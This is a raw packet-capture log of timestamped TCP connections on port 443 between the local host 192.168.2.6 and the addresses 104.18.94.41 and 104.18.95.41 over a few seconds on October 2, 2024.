                                                                          Oct 2, 2024 00:42:50.423510075 CEST49738443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:50.423518896 CEST44349738104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:50.423852921 CEST44349738104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:50.440958977 CEST49738443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:50.441045046 CEST44349738104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:50.441548109 CEST49738443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:50.483407974 CEST44349738104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:50.515518904 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:50.515559912 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:50.515763044 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:50.516383886 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:50.516391993 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:50.551239014 CEST44349738104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:50.551321030 CEST44349738104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:50.551393032 CEST49738443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:50.973701000 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.103848934 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.362965107 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.362982988 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.363677979 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.373946905 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.374109983 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.374660015 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.380244970 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:51.380291939 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.380430937 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:51.381761074 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:51.381774902 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.419399977 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.441355944 CEST49738443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.441382885 CEST44349738104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.477957964 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.478015900 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.478055000 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.478075981 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.478089094 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.478121042 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.478133917 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.478138924 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.478193998 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.478776932 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.479177952 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.479204893 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.479254007 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.479259968 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.479751110 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.484395981 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.564599991 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.564637899 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.564656019 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.564668894 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.564719915 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.564794064 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.564835072 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.564863920 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.564867020 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.564872026 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.564912081 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.565819025 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.565880060 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.565918922 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.565923929 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.566492081 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.566524982 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.566535950 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.566540003 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.566579103 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.566756964 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.567414999 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.567449093 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.567472935 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.567476988 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.567517042 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.567626953 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.568387032 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.568418026 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.568428040 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.568434000 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.568479061 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.568483114 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.569310904 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.569353104 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.569359064 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.651725054 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.651755095 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.651779890 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.651778936 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.651797056 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.651840925 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.651850939 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.651902914 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.651911974 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.652434111 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.652441978 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.652487040 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.652493954 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.652527094 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.652558088 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.652574062 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.652579069 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.652604103 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.653429985 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.653472900 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.653480053 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.653520107 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.653985023 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.654036045 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.654174089 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.654230118 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.654325962 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.654359102 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.654371023 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.654376984 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.654397964 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.654411077 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.655297041 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.655340910 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.655350924 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.655359983 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.655417919 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.656157970 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.656200886 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.656214952 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.656222105 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.656245947 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.656275988 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.658683062 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.658737898 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.738651991 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.738689899 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.738758087 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.738758087 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.738789082 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.738811970 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.738888979 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.738939047 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.759335995 CEST49739443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:51.759352922 CEST44349739104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.836739063 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.837945938 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:51.837959051 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.838279009 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.838841915 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:51.838898897 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:51.839124918 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:51.839278936 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:51.839297056 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.010421038 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.010473013 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.010504007 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.010524988 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.010551929 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.010564089 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.010593891 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.011107922 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.011138916 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.011153936 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.011167049 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.011210918 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.011218071 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.011926889 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.011955023 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.011972904 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.011981010 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.012018919 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.017647982 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.096611977 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.096673965 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.096699953 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.096762896 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.096795082 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.096806049 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.096812963 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.096849918 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.097692966 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.097754955 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.097785950 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.097799063 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.097812891 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.097848892 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.098457098 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.098504066 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.098548889 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.098555088 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.099334002 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.099365950 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.099380016 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.099394083 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.099435091 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.099441051 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.100202084 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.100235939 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.100253105 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.100260019 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.100303888 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.101052999 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.101111889 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.101140976 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.101156950 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.101162910 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.101449013 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.101845026 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.182890892 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.182929039 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.182955027 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.182967901 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.183013916 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.183096886 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.183173895 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.183182955 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.183228970 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.183238029 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.183979988 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.184019089 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.184031010 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.184042931 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.184056997 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.184869051 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.184925079 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.184931040 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.184952974 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.184976101 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.184983015 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.184992075 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.185818911 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.185853958 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.185867071 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.185873985 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.185900927 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.186697006 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.186752081 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.186758995 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.186805010 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.187563896 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.187624931 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.187639952 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.187694073 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.188421965 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.188477993 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.188517094 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.188570023 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.189388990 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.189451933 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.189505100 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.189554930 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.269135952 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.269180059 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.269220114 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.269241095 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.269257069 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.269280910 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.269423962 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.269470930 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.269520998 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.269568920 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.269606113 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.269653082 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.269778013 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.269825935 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.269833088 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.269880056 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.270173073 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.270226002 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.270231962 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.270245075 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.270275116 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.270283937 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.270328045 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.270334005 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.270373106 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.270378113 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.270421028 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.270545959 CEST49740443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.270560026 CEST44349740104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.592088938 CEST49745443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:52.592127085 CEST44349745104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.592452049 CEST49745443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:52.592776060 CEST49745443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:52.592791080 CEST44349745104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.985527992 CEST49746443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.985570908 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:52.988214016 CEST49746443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.988595009 CEST49746443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:52.988612890 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.393263102 CEST44349745104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.398294926 CEST49745443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:53.398312092 CEST44349745104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.398624897 CEST44349745104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.399334908 CEST49745443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:53.399403095 CEST44349745104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.399405003 CEST49745443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:53.447408915 CEST44349745104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.465981007 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.466445923 CEST49746443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:53.466456890 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.466876030 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.467509985 CEST49746443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:53.467585087 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.467817068 CEST49746443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:53.490466118 CEST49745443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:53.511400938 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.523355961 CEST44349745104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.523449898 CEST44349745104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.523509026 CEST49745443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:53.547698021 CEST49745443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:53.547718048 CEST44349745104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.618187904 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.618282080 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.618329048 CEST49746443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:53.618341923 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.618355036 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:53.618402004 CEST49746443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:53.790155888 CEST49746443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:53.790189981 CEST44349746104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:54.174820900 CEST49747443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:54.174866915 CEST44349747104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:54.175002098 CEST49747443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:54.175278902 CEST49747443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:54.175297976 CEST44349747104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:54.666625023 CEST44349747104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:54.667196989 CEST49747443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:54.667212009 CEST44349747104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:54.667519093 CEST44349747104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:54.668415070 CEST49747443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:54.668467999 CEST44349747104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:54.668853998 CEST49747443192.168.2.6104.18.95.41
